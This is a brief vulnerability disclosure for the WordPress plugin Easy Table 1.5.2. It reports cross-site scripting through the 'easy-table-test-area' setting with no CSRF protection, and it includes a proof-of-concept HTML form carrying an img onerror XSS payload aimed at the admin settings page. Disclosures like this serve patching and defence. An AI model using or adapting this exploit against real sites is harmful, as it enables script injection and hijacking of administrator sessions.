Hello,

Plugin: Easy Table 1.5.2 https://wordpress.org/plugins/easy-table/

1. Cross-Site Scripting (XSS) 

Authenticated administrators can inject html/js code (there is no CSRF protection).

Method: POST

Url: http://localhost/wp-admin/options-general.php?page=easy-table&gexttab=1

Vulnerable parameter: easy-table-test-area

Example PHP callstack:

EasyTable::easy_table_page   [/easy-table/easy-table.php:1034]

Verification:

--

<html>

<form method="POST" action="http://localhost/wp-admin/options-general.php?page=easy-table&gexttab=1">

<input type="text" name="test-easy-table" value="1" />

<input type="text" name="easy-table-test-area" value='"><img src=x onerror=alert(1) />'>

<input type="submit">

</html>

--